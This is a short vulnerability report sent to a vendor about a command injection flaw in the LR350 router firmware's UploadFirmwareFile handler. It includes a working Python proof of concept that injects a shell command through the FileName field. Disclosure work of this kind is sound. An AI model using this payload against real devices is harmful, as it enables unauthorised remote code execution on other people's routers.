Hi, we found a command injection vulnerability at **LR350 (**Firmware version V9.3.5u.6369_B20220309), and contact you at the first time.
The bug is in function UploadFirmwareFile of the file /cgi-bin/cstecgi.cgi which can control FileName to attack. FileName is directly copied to doSystem, result in command injection vulnerability.
PoC
import requests url = "http://192.168.17.220:80/cgi-bin/cstecgi.cgi" cookie = {"Cookie":"uid=1234"} data = {'topicurl' : "UploadFirmwareFile", "FileName" : ";ls > /tmp/hack;"} response = requests.post(url, cookies=cookie, json=data) print(response.text) print(response)
Impact
Remote code execution
After execute the poc, we can see that ls is executed